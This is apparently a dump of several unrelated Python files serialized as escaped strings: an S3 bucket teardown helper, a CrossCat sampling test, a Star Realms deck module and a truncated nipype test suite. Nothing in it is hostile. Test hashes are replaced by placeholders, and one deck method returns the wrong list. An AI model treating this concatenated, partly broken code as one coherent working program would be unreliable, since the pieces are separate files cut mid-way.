""BucketNotEmpty"": raise\n if not self.depl.logger.confirm(""are you sure you want to destroy S3 bucket ‘{0}’?"".format(self.bucket_name)): return False\n bucket.objects.all().delete()\n bucket.delete()\n except botocore.exceptions.ClientError as e:\n if e.response[\'Error\'][\'Code\'] != ""NoSuchBucket"": raise\n return True\n\n\ndef region_to_s3_location(region):\n # S3 location names are identical to EC2 regions, except for\n # us-east-1 and eu-west-1.\n if region == ""eu-west-1"": return ""EU""\n elif region == ""us-east-1"": return ""US""\n else: return region\n', '#\n# Copyright (c) 2010-2014, MIT Probabilistic Computing Project\n#\n# Lead Developers: Dan Lovell and Jay Baxter\n# Authors: Dan Lovell, Baxter Eaves, Jay Baxter, Vikash Mansinghka\n# Research Leads: Vikash Mansinghka, Patrick Shafto\n#\n# Licensed under the Apache License, Version 2.0 (the ""License"");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an ""AS IS"" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nimport argparse\nimport sys\nfrom collections import Counter\n#\nimport numpy\nimport pylab\npylab.ion()\npylab.show()\n#\nimport crosscat.tests.plot_utils as pu\nimport crosscat.utils.file_utils as fu\nimport crosscat.utils.sample_utils as su\nimport crosscat.utils.api_utils as au\n\n\n# parse some arguments\nparser = argparse.ArgumentParser()\nparser.add_argument(\'pkl_name\', type=str)\nparser.add_argument(\'--inf_seed\', default=0, type=int)\nparser.add_argument(\'--hostname\', default=\'127.0.0.1\', type=str)\nargs = parser.parse_args()\npkl_name = args.pkl_name\ninf_seed = args.inf_seed\nhostname = args.hostname\n\n# FIXME: getting weird error on conversion to int: too large from inside pyx\ndef get_next_seed(max_val=32767): # sys.maxint):\n return random_state.randint(max_val)\n\n# resume from saved name\nsave_dict = fu.unpickle(pkl_name)\nrandom_state = numpy.random.RandomState(inf_seed)\nM_c = save_dict[\'M_c\']\nX_L = save_dict[\'X_L\']\nX_D = save_dict[\'X_D\']\n\n# FIXME: test constraints\n# Y = [su.Bunch(index=2,value=2.3), su.Bunch(index=0,value=-4.)]\nY = None\n\n# test simple_predictive_sample_observed\nviews_replicating_samples_params = su.determine_replicating_samples_params(X_L, X_D)\nviews_samples = []\nfor replicating_samples_params in views_replicating_samples_params:\n this_view_samples = []\n for replicating_sample_params in replicating_samples_params:\n this_view_this_sample = su.simple_predictive_sample(\n M_c, X_L, X_D, get_next_seed=get_next_seed, **replicating_sample_params)\n this_view_samples.extend(this_view_this_sample)\n views_samples.append(this_view_samples)\nfor view_idx, view_samples in enumerate(views_samples):\n data_array = numpy.array(view_samples)\n pu.plot_T(data_array)\n pylab.title(\'simple_predictive_sample observed, view %s on local\' % view_idx)\n\n# test simple_predictive_sample_observed REMOTE\n# hostname = \'ec2-23-22-208-4.compute-1.amazonaws.com\'\nURI = \'http://\' + hostname + \':8007\'\nmethod_name = \'simple_predictive_sample\'\n#\nviews_samples = []\nfor replicating_samples_params in views_replicating_samples_params:\n this_view_samples = []\n for replicating_sample_params in replicating_samples_params:\n args_dict = dict(\n M_c=save_dict[\'M_c\'],\n X_L=save_dict[\'X_L\'],\n X_D=save_dict[\'X_D\'],\n Y=replicating_sample_params[\'Y\'],\n Q=replicating_sample_params[\'Q\'],\n n=replicating_sample_params[\'n\'],\n )\n this_view_this_sample, id = au.call(\n method_name, args_dict, URI)\n print id\n this_view_samples.extend(this_view_this_sample)\n views_samples.append(this_view_samples)\nfor view_idx, view_samples in enumerate(views_samples):\n data_array = numpy.array(view_samples)\n pu.plot_T(data_array)\n pylab.title(\'simple_predictive_sample observed, view %s on remote\' % view_idx)\n\n# test simple_predictive_sample_unobserved\nobserved_Q = views_replicating_samples_params[0][0][\'Q\']\nQ = [(int(1E6), old_tuple[1]) for old_tuple in observed_Q]\nnew_row_samples = []\nnew_row_sample = su.simple_predictive_sample(\n M_c, X_L, X_D, Y, Q, get_next_seed, n=1000)\nnew_row_samples.extend(new_row_sample)\nnew_row_samples = numpy.array(new_row_samples)\npu.plot_T(new_row_samples)\n\n# once more with constraint\nY = [(int(1E6), 0, 100)]\nnew_row_sample = su.simple_predictive_sample(\n M_c, X_L, X_D, Y, Q, get_next_seed, n=1)\n\n# test impute\n# imputed_value = su.impute(M_c, X_L, X_D, Y, [Q[3]], 100, get_next_seed)\n', '# -*- coding: utf-8 -*-\n""""""\n.. module:: deck\n :synopsis: Encapsulates the behavior of card collections\n.. moduleauthor:: Zach Mitchell dummy@email.com\n""""""\n\nfrom random import shuffle\nfrom typing import List\nfrom .cards import (\n Card,\n CardFaction,\n CardEffect,\n CardAction,\n CardTarget\n)\nfrom .cardrepo import CardRepo\nfrom .exceptions import (\n RealmsException,\n MainDeckEmpty,\n PlayerDeckEmpty,\n PlayerDeckInitSize,\n PlayerDeckInitContents,\n UUIDNotFoundError,\n HandInitError\n)\nfrom collections import Counter\nfrom typing import NamedTuple\n\nCardList = List[Card]\nEffectList = List[CardEffect]\nFactionList = List[CardFaction]\n\n\nEffectRecord = NamedTuple(\'EffectRecord\', [\n (\'target\', CardTarget),\n (\'action\', CardAction),\n (\'value\', int),\n (\'uuid\', str),\n (\'provider\', str)])\n\n\nclass PlayerDeck(object):\n """"""\n Records the state of the player\'s deck\n\n At any given point in time the player may have three piles of cards: undrawn cards, a\n hand of cards, and a pile of used (discarded) cards. PlayerDeck records which cards are\n in which pile, provides an interface from which a hand of cards can be assembled, and\n shuffles the deck when necessary.\n\n Parameters\n ----------\n player_cards : List[Card]\n The list of cards from which the player\'s starting deck will be constructed\n\n Raises\n ------\n PlayerDeckInitSize\n Raised when constructing the deck with the wrong number of cards\n PlayerDeckInitContents\n Raised when constructing the deck with cards other than Vipers and Scouts\n """"""\n\n starting_size = 10\n\n def __init__(self, player_cards: CardList):\n try:\n self._validate_deck_size(player_cards)\n self._validate_deck_contents(player_cards)\n except RealmsException:\n raise\n self._undrawn: CardList = player_cards\n shuffle(self._undrawn) # shuffled in place\n self._discards: CardList = []\n\n @staticmethod\n def _validate_deck_size(cards: CardList) -> None:\n """"""Ensures that the starting deck contains the correct\n number of cards\n\n Parameters\n ----------\n cards : CardList\n The tentative starting deck\n\n Raises\n ------\n PlayerDeckInitSize\n Raised if the tentative starting deck is not the correct size\n """"""\n if len(cards) != PlayerDeck.starting_size:\n raise PlayerDeckInitSize(len(cards))\n return\n\n @staticmethod\n def _validate_deck_contents(cards) -> None:\n """"""Ensures that the tentative starting deck contains only Vipers and Scouts\n\n Parameters\n ----------\n cards : CardList\n The tentative starting deck\n\n Raises\n ------\n PlayerDeckInitContents\n Raised if the tentative starting deck contains cards other than Vipers or Scouts\n """"""\n for c in cards:\n if (c.name != \'Viper\') and (c.name != \'Scout\'):\n raise PlayerDeckInitContents(c.name)\n return\n\n def _next_card(self) -> Card:\n """"""Produces the next card from the player\'s deck\n\n Attempts to draw a card from the top of the undrawn pile. If\n the undrawn pile is empty, the undrawn pile is replenished from\n the discard pile and shuffled before attempting to draw a card again.\n An attempt to draw a card from the undrawn pile while both the undrawn\n pile and discard pile are empty will raise a ``PlayerDeckEmpty`` exception.\n\n Returns\n -------\n Card\n A card from the top of the undrawn pile\n\n Raises\n ------\n PlayerDeckEmpty\n Raised when attempting to draw a card while both undrawn and discard\n piles are empty\n """"""\n if len(self._undrawn) > 0:\n return self._undrawn.pop()\n elif len(self._discards) > 0:\n self._refill_undrawn()\n return self._undrawn.pop()\n else:\n raise PlayerDeckEmpty\n\n @property\n def cards_remaining(self) -> int:\n """"""The total number of cards left in the undrawn and discard piles\n\n Returns\n -------\n int\n The number of cards left to draw from\n """"""\n return len(self._undrawn) + len(self._discards)\n\n def _refill_undrawn(self) -> None:\n """"""Refills the undrawn pile with cards from the discard pile\n\n Note\n ----\n The cards in the discard pile are shuffled before being placed\n back into the undrawn pile\n """"""\n self._undrawn: CardList = self._discards\n shuffle(self._undrawn) # shuffled in place\n self._discards: CardList = []\n return\n\n def discard(self, card: Card) -> None:\n """"""Sends the card to the discard pile\n\n Parameters\n ----------\n card : Card\n The card to send to the discard pile\n """"""\n self._discards.append(card)\n return\n\n def draw(self, num=5) -> CardList:\n """"""Draws the specified number of cards from the undrawn pile\n\n Parameters\n ----------\n num : int (Optional)\n The number of cards to draw (Default is 5)\n\n Returns\n -------\n List[Card]\n The list of cards that were drawn\n\n Raises\n ------\n IndexError\n Raised if no cards are left to draw, or the number of cards requested\n is not a positive integer\n\n Note\n ----\n If there are cards remaining in the deck but there are fewer cards than\n were requested, then as many cards as possible are returned.\n """"""\n if (num <= 0) or (self.cards_remaining == 0) or (not isinstance(num, int)):\n raise IndexError\n cards: CardList = []\n for _ in range(num):\n try:\n cards.append(self._next_card())\n except PlayerDeckEmpty:\n break\n return cards\n\n def _scrap(self, card):\n """"""\n Permanently removes a card from the discard pile\n """"""\n pass\n\n\nclass MainDeck(object):\n """"""The deck from which players can acquire cards\n\n Parameters\n ----------\n cardrepo : CardRepo\n The repository from which the cards are obtained\n """"""\n def __init__(self, cardrepo: CardRepo):\n self._repo: CardRepo = cardrepo\n self._cards: CardList = self._repo.main_deck_cards()\n shuffle(self._cards)\n return\n\n def next_card(self) -> Card:\n """"""Produces the next card from the main deck\n\n Returns\n -------\n Card\n A card from the top of the main deck\n\n Raises\n ------\n MainDeckEmpty\n Raised when attempting to draw a card when the deck is empty\n """"""\n if len(self._cards) > 0:\n return self._cards.pop()\n else:\n raise MainDeckEmpty\n\n\nclass TradeRow(object):\n """"""Presents the cards that players may acquire\n\n Parameters\n ----------\n maindeck : MainDeck\n The deck from which the trade row is drawn\n cardrepo : CardRepo\n The repository from which cards are obtained\n """"""\n def __init__(self, maindeck: MainDeck, cardrepo: CardRepo):\n self._maindeck: MainDeck = maindeck\n self._repo: CardRepo = cardrepo\n self._explorer = None\n self._cards = []\n\n @property\n def available(self) -> CardList:\n """"""Produces the list of all cards available for purchase\n\n Returns\n -------\n List[Card]\n The list of cards available for purchase\n """"""\n return self.cards + [self.explorer]\n\n @property\n def cards(self) -> CardList:\n """"""Produces the list of cards available for purchase\n from the main deck\n\n Returns\n -------\n List[Card]\n The list of available cards from the main deck\n """"""\n while len(self._cards) < 5:\n try:\n card: Card = self._maindeck.next_card()\n except MainDeckEmpty:\n break\n self._cards.append(card)\n return self._cards\n\n @property\n def explorer(self) -> Card:\n """"""Produces the current Explorer available for purchase\n\n Returns\n -------\n Card\n The current Explorer\n """"""\n if self._explorer is None:\n self._explorer: Card = self._repo.new_explorer()\n return self._explorer\n\n def acquire(self, uuid: str) -> Card:\n """"""Produces the card with the specified UUID\n\n Parameters\n ----------\n uuid : str\n The UUID of the card the player wishes to acquire\n\n Returns\n -------\n Card\n The card with the specified UUID\n\n Raises\n ------\n UUIDNotFoundError\n Raised when the UUID of the requested card is not found\n in the list of available cards\n """"""\n cards_bools = [c.uuid == uuid for c in self.cards]\n if True in cards_bools:\n i = cards_bools.index(True)\n return self._cards.pop(i)\n elif self.explorer.uuid == uuid:\n card = self._explorer\n self._explorer = None\n return card\n else:\n raise UUIDNotFoundError\n\n def scrap(self, uuid: str) -> None:\n """"""Permanently removes a card from the trade row\n\n Parameters\n ----------\n uuid : str\n The UUID of the card to remove\n """"""\n cards_bools = [c.uuid == uuid for c in self.cards]\n if True in cards_bools:\n i = cards_bools.index(True)\n del self._cards[i]\n elif self.explorer.uuid == uuid:\n self._explorer = None\n else:\n raise UUIDNotFoundError\n return\n\n\nclass Hand(object):\n """"""The player\'s hand of cards\n\n A Hand is made from a list of cards drawn from the undrawn pile of the player\'s deck,\n as well as any bases that were played previously and have not been destroyed.\n\n The processing of cards into a collection of effects is a multi-step process:\n\n 1. The basic effects are pulled from each card\n 2. The factions are tallied up to see which cards may activate their ally abilities\n 3. Ally abilities are pulled from each card\n 4. The effects are aggregated by their action types\n 5. Effects are applied in whatever order the user chooses\n 6. If cards are drawn as the result of an action, the effects list is updated\n\n Parameters\n ----------\n to_draw : int\n The number of cards to draw initially\n existing_bases : List[Card]\n Any bases that were played previously and have not yet been destroyed\n playerdeck : PlayerDeck\n The player\'s deck\n """"""\n def __init__(self, to_draw: int, existing_bases: CardList, playerdeck: PlayerDeck):\n if (to_draw < 0) or (to_draw > 5):\n raise HandInitError\n try:\n drawn: CardList = playerdeck.draw(to_draw)\n except IndexError:\n drawn: CardList = []\n self.cards = drawn + existing_bases\n self._playerdeck = playerdeck\n return\n\n @staticmethod\n def _collect_basic_effects(cards: List[Card]) -> List[EffectRecord]:\n """"""Assembles a list of `EffectRecord`s from the cards in the hand\n """"""\n basic_effects: List[EffectRecord] = []\n for c in cards:\n effects: List[CardEffect] = c.effects_basic\n records = [EffectRecord(target=e.target,\n action=e.action,\n value=e.value,\n uuid=e.uuid,\n provider=c.uuid)\n for e in effects]\n basic_effects += records\n return records\n\n @staticmethod\n def _collect_ally_factions(cards: List[Card]) -> List[CardFaction]:\n """"""Assembles a list of factions that should have their ally abilities activated\n """"""\n factions: CardFaction = [c.faction for c in cards]\n if CardFaction.ALL in factions:\n return [CardFaction.BLOB, CardFaction.STAR, CardFaction.FEDERATION, CardFaction.MACHINE]\n counts = Counter(factions)\n allies: List[CardFaction] = [key for key in counts.keys()\n if counts[key] > 1 and key != CardFaction.UNALIGNED]\n return allies\n\n @staticmethod\n def _collect_ally_effects(cards: List[Card], facs: List[CardFaction]) -> List[EffectRecord]:\n """"""Assembles a list of the ally effects that are applicable\n """"""\n ally_effects: List[EffectRecord] = []\n for c in cards:\n effects: List[CardEffect] = c.effects_ally\n records = [EffectRecord(target=e.target,\n action=e.action,\n value=e.value,\n uuid=e.uuid,\n provider=c.uuid)\n for e in effects if c.faction in facs]\n ally_effects += records\n return ally_effects\n\n def _collect_effects(self) -> List[EffectRecord]:\n """"""Assembles a list of effects provided by the player\'s hand\n """"""\n basic_effects: List[EffectRecord] = Hand._collect_basic_effects(self.cards)\n ally_factions: List[CardFaction] = Hand._collect_ally_factions(self.cards)\n ally_effects: List[EffectRecord] = Hand._collect_ally_effects(self.cards, ally_factions)\n return basic_effects + ally_effects\n', '# -*- coding: utf-8 -*-\n# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-\n# vi: set ft=python sts=4 ts=4 sw=4 et:\nfrom __future__ import print_function, unicode_literals\nfrom future import standard_library\nstandard_library.install_aliases()\n\nfrom builtins import open, str, bytes\nimport os\nimport tempfile\nimport shutil\nimport warnings\nimport simplejson as json\n\nfrom nipype.testing import (assert_equal, assert_not_equal, assert_raises,\n assert_true, assert_false, with_setup, package_check,\n skipif, example_data)\nimport nipype.interfaces.base as nib\nfrom nipype.utils.filemanip import split_filename\nfrom nipype.interfaces.base import Undefined, config\nfrom traits.testing.nose_tools import skip\nimport traits.api as traits\n\n\ndef test_bunch():\n b = nib.Bunch()\n yield assert_equal, b.__dict__, {}\n b = nib.Bunch(a=1, b=[2, 3])\n yield assert_equal, b.__dict__, {\'a\': 1, \'b\': [2, 3]}\n\n\ndef test_bunch_attribute():\n b = nib.Bunch(a=1, b=[2, 3], c=None)\n yield assert_equal, b.a, 1\n yield assert_equal, b.b, [2, 3]\n yield assert_equal, b.c, None\n\n\ndef test_bunch_repr():\n b = nib.Bunch(b=2, c=3, a=dict(n=1, m=2))\n yield assert_equal, repr(b), ""Bunch(a={\'m\': 2, \'n\': 1}, b=2, c=3)""\n\n\ndef test_bunch_methods():\n b = nib.Bunch(a=2)\n b.update(a=3)\n newb = b.dictcopy()\n yield assert_equal, b.a, 3\n yield assert_equal, b.get(\'a\'), 3\n yield assert_equal, b.get(\'badkey\', \'otherthing\'), \'otherthing\'\n yield assert_not_equal, b, newb\n yield assert_equal, type(dict()), type(newb)\n yield assert_equal, newb[\'a\'], 3\n\n\ndef test_bunch_hash():\n # NOTE: Since the path to the json file is included in the Bunch,\n # the hash will be unique to each machine.\n pth = os.path.split(os.path.abspath(__file__))[0]\n json_pth = os.path.join(pth, \'realign_json.json\')\n b = nib.Bunch(infile=json_pth,\n otherthing=\'blue\',\n yat=True)\n newbdict, bhash = b._get_bunch_hash()\n yield assert_equal, bhash, \'PI:KEY\'\n # Make sure the hash stored in the json file for `infile` is correct.\n jshash = nib.md5()\n with open(json_pth, \'r\') as fp:\n jshash.update(fp.read().encode(\'utf-8\'))\n yield assert_equal, newbdict[\'infile\'][0][1], jshash.hexdigest()\n yield assert_equal, newbdict[\'yat\'], True\n\n\n# create a temp file\n# global tmp_infile, tmp_dir\n# tmp_infile = None\n# tmp_dir = None\ndef setup_file():\n # global tmp_infile, tmp_dir\n tmp_dir = tempfile.mkdtemp()\n tmp_infile = os.path.join(tmp_dir, \'foo.txt\')\n with open(tmp_infile, \'w\') as fp:\n fp.writelines([\'123456789\'])\n return tmp_infile\n\n\ndef teardown_file(tmp_dir):\n shutil.rmtree(tmp_dir)\n\n\ndef test_TraitedSpec():\n yield assert_true, nib.TraitedSpec().get_hashval()\n yield assert_equal, nib.TraitedSpec().__repr__(), \'\\n\\n\'\n\n class spec(nib.TraitedSpec):\n foo = nib.traits.Int\n goo = nib.traits.Float(usedefault=True)\n\n yield assert_equal, spec().foo, Undefined\n yield assert_equal, spec().goo, 0.0\n specfunc = lambda x: spec(hoo=x)\n yield assert_raises, nib.traits.TraitError, specfunc, 1\n infields = spec(foo=1)\n hashval = ([(\'foo\', 1), (\'goo\', \'0.0000000000\')], \'PI:KEY\')\n yield assert_equal, infields.get_hashval(), hashval\n # yield assert_equal, infields.hashval[1], hashval[1]\n yield assert_equal, infields.__repr__(), \'\\nfoo = 1\\ngoo = 0.0\\n\'\n\n\n@skip\ndef test_TraitedSpec_dynamic():\n from pickle import dumps, loads\n a = nib.BaseTraitedSpec()\n a.add_trait(\'foo\', nib.traits.Int)\n a.foo = 1\n assign_a = lambda: setattr(a, \'foo\', \'a\')\n yield assert_raises, Exception, assign_a\n pkld_a = dumps(a)\n unpkld_a = loads(pkld_a)\n assign_a_again = lambda: setattr(unpkld_a, \'foo\', \'a\')\n yield assert_raises, Exception, assign_a_again\n\n\ndef test_TraitedSpec_logic():\n class spec3(nib.TraitedSpec):\n _xor_inputs = (\'foo\', \'bar\')\n\n foo = nib.traits.Int(xor=_xor_inputs,\n desc=\'foo or bar, not both\')\n bar = nib.traits.Int(xor=_xor_inputs,\n desc=\'bar or foo, not both\')\n kung = nib.traits.Float(requires=(\'foo\',),\n position=0,\n desc=\'kung foo\')\n\n class out3(nib.TraitedSpec):\n output = nib.traits.Int\n\n class MyInterface(nib.BaseInterface):\n input_spec = spec3\n output_spec = out3\n\n myif = MyInterface()\n yield assert_raises, TypeError, setattr(myif.inputs, \'kung\', 10.0)\n myif.inputs.foo = 1\n yield assert_equal, myif.inputs.foo, 1\n set_bar = lambda: setattr(myif.inputs, \'bar\', 1)\n yield assert_raises, IOError, set_bar\n yield assert_equal, myif.inputs.foo, 1\n myif.inputs.kung = 2\n yield assert_equal, myif.inputs.kung, 2.0\n\n\ndef test_deprecation():\n with warnings.catch_warnings(record=True) as w:\n warnings.filterwarnings(\'always\', \'\', UserWarning)\n\n class DeprecationSpec1(nib.TraitedSpec):\n foo = nib.traits.Int(deprecated=\'0.1\')\n spec_instance = DeprecationSpec1()\n set_foo = lambda: setattr(spec_instance, \'foo\', 1)\n yield assert_raises, nib.TraitError, set_foo\n yield assert_equal, len(w), 0, \'no warnings, just errors\'\n\n with warnings.catch_warnings(record=True) as w:\n warnings.filterwarnings(\'always\', \'\', UserWarning)\n\n class DeprecationSpec1numeric(nib.TraitedSpec):\n foo = nib.traits.Int(deprecated=\'0.1\')\n spec_instance = DeprecationSpec1numeric()\n set_foo = lambda: setattr(spec_instance, \'foo\', 1)\n yield assert_raises, nib.TraitError, set_foo\n yield assert_equal, len(w), 0, \'no warnings, just errors\'\n\n with warnings.catch_warnings(record=True) as w:\n warnings.filterwarnings(\'always\', \'\', UserWarning)\n\n class DeprecationSpec2(nib.TraitedSpec):\n foo = nib.traits.Int(deprecated=\'100\', new_name=\'bar\')\n spec_instance = DeprecationSpec2()\n set_foo = lambda: setattr(spec_instance, \'foo\', 1)\n yield assert_raises, nib.TraitError, set_foo\n yield assert_equal, len(w), 0, \'no warnings, just errors\'\n\n with warnings.catch_warnings(record=True) as w:\n warnings.filterwarnings(\'always\', \'\', UserWarning)\n\n class DeprecationSpec3(nib.TraitedSpec):\n foo = nib.traits.Int(deprecated=\'1000\', new_name=\'bar\')\n bar = nib.traits.Int()\n spec_instance = DeprecationSpec3()\n not_raised = True\n try:\n spec_instance.foo = 1\n except nib.TraitError:\n not_raised = False\n yield assert_true, not_raised\n yield assert_equal, len(w), 1, \'deprecated warning 1 %s\' % [w1.message for w1 in w]\n\n with warnings.catch_warnings(record=True) as w:\n warnings.filterwarnings(\'always\', \'\', UserWarning)\n\n class DeprecationSpec3(nib.TraitedSpec):\n foo = nib.traits.Int(deprecated=\'1000\', new_name=\'bar\')\n bar = nib.traits.Int()\n spec_instance = DeprecationSpec3()\n not_raised = True\n try:\n spec_instance.foo = 1\n except nib.TraitError:\n not_raised = False\n yield assert_true, not_raised\n yield assert_equal, spec_instance.foo, Undefined\n yield assert_equal, spec_instance.bar, 1\n yield assert_equal, len(w), 1, \'deprecated warning 2 %s\' % [w1.message for w1 in w]\n\n\ndef test_namesource():\n tmp_infile = setup_file()\n tmpd, nme, ext = split_filename(tmp_infile)\n pwd = os.getcwd()\n os.chdir(tmpd)\n\n class spec2(nib.CommandLineInputSpec):\n moo = nib.File(name_source=[\'doo\'], hash_files=False, argstr=""%s"",\n position=2)\n doo = nib.File(exists=True, argstr=""%s"", position=1)\n goo = traits.Int(argstr=""%d"", position=4)\n poo = nib.File(name_source=[\'goo\'], hash_files=False, argstr=""%s"", position=3)\n\n class TestName(nib.CommandLine):\n _cmd = ""mycommand""\n input_spec = spec2\n testobj = TestName()\n testobj.inputs.doo = tmp_infile\n testobj.inputs.goo = 99\n yield assert_true, \'%s_generated\' % nme in testobj.cmdline\n testobj.inputs.moo = ""my_%s_template""\n yield assert_true, \'my_%s_template\' % nme in testobj.cmdline\n os.chdir(pwd)\n teardown_file(tmpd)\n\n\ndef test_chained_namesource():\n tmp_infile = setup_file()\n tmpd, nme, ext = split_filename(tmp_infile)\n pwd = os.getcwd()\n os.chdir(tmpd)\n\n class spec2(nib.CommandLineInputSpec):\n doo = nib.File(exists=True, argstr=""%s"", position=1)\n moo = nib.File(name_source=[\'doo\'], hash_files=False, argstr=""%s"",\n position=2, name_template=\'%s_mootpl\')\n poo = nib.File(name_source=[\'moo\'], hash_files=False,\n argstr=""%s"", position=3)\n\n class TestName(nib.CommandLine):\n _cmd = ""mycommand""\n input_spec = spec2\n\n testobj = TestName()\n testobj.inputs.doo = tmp_infile\n res = testobj.cmdline\n yield assert_true, \'%s\' % tmp_infile in res\n yield assert_true, \'%s_mootpl \' % nme in res\n yield assert_true, \'%s_mootpl_generated\' % nme in res\n\n os.chdir(pwd)\n teardown_file(tmpd)\n\n\ndef test_cycle_namesource1():\n tmp_infile = setup_file()\n tmpd, nme, ext = split_filename(tmp_infile)\n pwd = os.getcwd()\n os.chdir(tmpd)\n\n class spec3(nib.CommandLineInputSpec):\n moo = nib.File(name_source=[\'doo\'], hash_files=False, argstr=""%s"",\n position=1, name_template=\'%s_mootpl\')\n poo = nib.File(name_source=[\'moo\'], hash_files=False,\n argstr=""%s"", position=2)\n doo = nib.File(name_source=[\'poo\'], hash_files=False,\n argstr=""%s"", position=3)\n\n class TestCycle(nib.CommandLine):\n _cmd = ""mycommand""\n input_spec = spec3\n\n # Check that an exception is raised\n to0 = TestCycle()\n not_raised = True\n try:\n to0.cmdline\n except nib.NipypeInterfaceError:\n not_raised = False\n yield assert_false, not_raised\n\n os.chdir(pwd)\n teardown_file(tmpd)\n\n\ndef test_cycle_namesource2():\n tmp_infile = setup_file()\n tmpd, nme, ext = split_filename(tmp_infile)\n pwd = os.getcwd()\n os.chdir(tmpd)\n\n class spec3(nib.CommandLineInputSpec):\n moo = nib.File(name_source=[\'doo\'], hash_files=False, argstr=""%s"",\n position=1, name_template=\'%s_mootpl\')\n poo = nib.File(name_source=[\'moo\'], hash_files=False,\n argstr=""%s"", position=2)\n doo = nib.File(name_source=[\'poo\'], hash_files=False,\n argstr=""%s"", position=3)\n\n class TestCycle(nib.CommandLine):\n _cmd = ""mycommand""\n input_spec = spec3\n\n # Check that loop can be broken by setting one of the inputs\n to1 = TestCycle()\n to1.inputs.poo = tmp_infile\n\n not_raised = True\n try:\n res = to1.cmdline\n except nib.NipypeInterfaceError:\n not_raised = False\n print(res)\n\n yield assert_true, not_raised\n yield assert_true, \'%s\' % tmp_infile in res\n yield assert_true, \'%s_generated\' % nme in res\n yield assert_true, \'%s_generated_mootpl\' % nme in res\n\n os.chdir(pwd)\n teardown_file(tmpd)\n\n\ndef checknose():\n """"""check version of nose for known incompatability""""""\n mod = __import__(\'nose\')\n if mod.__versioninfo__[1] <= 11:\n return 0\n else:\n return 1\n\n\n@skipif(checknose)\ndef test_TraitedSpec_withFile():\n tmp_infile = setup_file()\n tmpd, nme = os.path.split(tmp_infile)\n yield assert_true, os.path.exists(tmp_infile)\n\n class spec2(nib.TraitedSpec):\n moo = nib.File(exists=True)\n doo = nib.traits.List(nib.File(exists=True))\n infields = spec2(moo=tmp_infile, doo=[tmp_infile])\n hashval = infields.get_hashval(hash_method=\'content\')\n yield assert_equal, hashval[1], \'PI:KEY\'\n teardown_file(tmpd)\n\n\n@skipif(checknose)\ndef test_TraitedSpec_withNoFileHashing():\n tmp_infile = setup_file()\n tmpd, nme = os.path.split(tmp_infile)\n pwd = os.getcwd()\n os.chdir(tmpd)\n yield assert_true, os.path.exists(tmp_infile)\n\n class spec2(nib.TraitedSpec):\n moo = nib.File(exists=True, hash_files=False)\n doo = nib.traits.List(nib.File(exists=True))\n infields = spec2(moo=nme, doo=[tmp_infile])\n hashval = infields.get_hashval(hash_method=\'content\')\n yield assert_equal, hashval[1], \'PI:KEY\'\n\n class spec3(nib.TraitedSpec):\n moo = nib.File(exists=True, name_source=""doo"")\n doo = nib.traits.List(nib.File(exists=True))\n infields = spec3(moo=nme, doo=[tmp_infile])\n hashval1 = infields.get_hashval(hash_method=\'content\')\n\n class spec4(nib.TraitedSpec):\n moo = nib.File(exists=True)\n doo = nib.traits.List(nib.File(exists=True))\n infields = spec4(moo=nme, doo=[tmp_infile])\n hashval2 = infields.get_hashval(hash_method=\'content\')\n\n yield assert_not_equal, hashval1[1], hashval2[1]\n os.chdir(pwd)\n teardown_file(tmpd)\n\n\ndef test_Interface():\n yield assert_equal, nib.Interface.input_spec, None\n yield assert_equal, nib.Interface.output_spec, None\n yield assert_raises, NotImplementedError, nib.Interface\n yield assert_raises, NotImplementedError, nib.Interface.help\n yield assert_raises, NotImplementedError, nib.Interface._inputs_help\n yield assert_raises, NotImplementedError, nib.Interface._outputs_help\n yield assert_raises, NotImplementedError, nib.Interface._outputs\n\n class DerivedInterface(nib.Interface):\n def __init__(self):\n pass\n\n nif = DerivedInterface()\n yield assert_raises, NotImplementedError, nif.run\n yield assert_raises, NotImplementedError, nif.aggregate_outputs\n yield assert_raises, NotImplementedError, nif._list_outputs\n yield assert_raises, NotImplementedError, nif._get_filecopy_info\n\n\ndef test_BaseInterface():\n yield assert_equal, nib.BaseInterface.help(), None\n yield assert_equal, nib.BaseInterface._get_filecopy_info(), []\n\n class InputSpec(nib.TraitedSpec):\n foo = nib.traits.Int(desc=\'a random int\')\n goo = nib.traits.Int(desc=\'a random int\', mandatory=True)\n moo = nib.traits.Int(desc=\'a random int\', mandatory=False)\n hoo = nib.traits.Int(desc=\'a random int\', usedefault=True)\n zoo = nib.File(desc=\'a file\', copyfile=False)\n woo = nib.File(desc=\'a file\', copyfile=True)\n\n class OutputSpec(nib.TraitedSpec):\n foo = nib.traits.Int(desc=\'a random int\')\n\n class DerivedInterface(nib.BaseInterface):\n input_spec = InputSpec\n\n yield assert_equal, DerivedInterface.help(), None\n yield assert_true, \'moo\' in \'\'.join(DerivedInterface._inputs_help())\n yield assert_equal, DerivedInterface()._outputs(), None\n yield assert_equal, DerivedInterface._get_filecopy_info()[0][\'key\'], \'woo\'\n yield assert_true, DerivedInterface._get_filecopy_info()[0][\'copy\']\n yield assert_equal, DerivedInterface._get_filecopy_info()[1][\'key\'], \'zoo\'\n yield assert_false, DerivedInterface._get_filecopy_info()[1][\'copy\']\n yield assert_equal, DerivedInterface().inputs.foo, Undefined\n yield assert_raises, ValueError, DerivedInterface()._check_mandatory_inputs\n yield assert_equal, DerivedInterface(goo=1)._check_mandatory_inputs(), None\n yield assert_raises, ValueError, DerivedInterface().run\n yield assert_raises, NotImplementedError, DerivedInterface(goo=1).run\n\n class DerivedInterface2(DerivedInterface):\n output_spec = OutputSpec\n\n def _run_interface(self, runtime):\n return runtime\n\n yield assert_equal, DerivedInterface2.help(), None\n yield assert_equal, DerivedInterface2()._outputs().foo, Undefined\n yield assert_raises, NotImplementedError, DerivedInterface2(goo=1).run\n\n nib.BaseInterface.input_spec = None\n yield assert_raises, Exception, nib.BaseInterface\n\ndef test_BaseInterface_load_save_inputs():\n tmp_dir = tempfile.mkdtemp()\n tmp_json = os.path.join(tmp_dir, \'settings.json\')\n\n class InputSpec(nib.TraitedSpec):\n input1 = nib.traits.Int()\n input2 = nib.traits.Float()\n input3 = nib.traits.Bool()\n input4 = nib.traits.Str()\n\n class DerivedInterface(nib.BaseInterface):\n input_spec = InputSpec\n\n def __init__(self, **inputs):\n super(DerivedInterface, self).__init__(**inputs)\n\n inputs_dict = {\'input1\': 12, 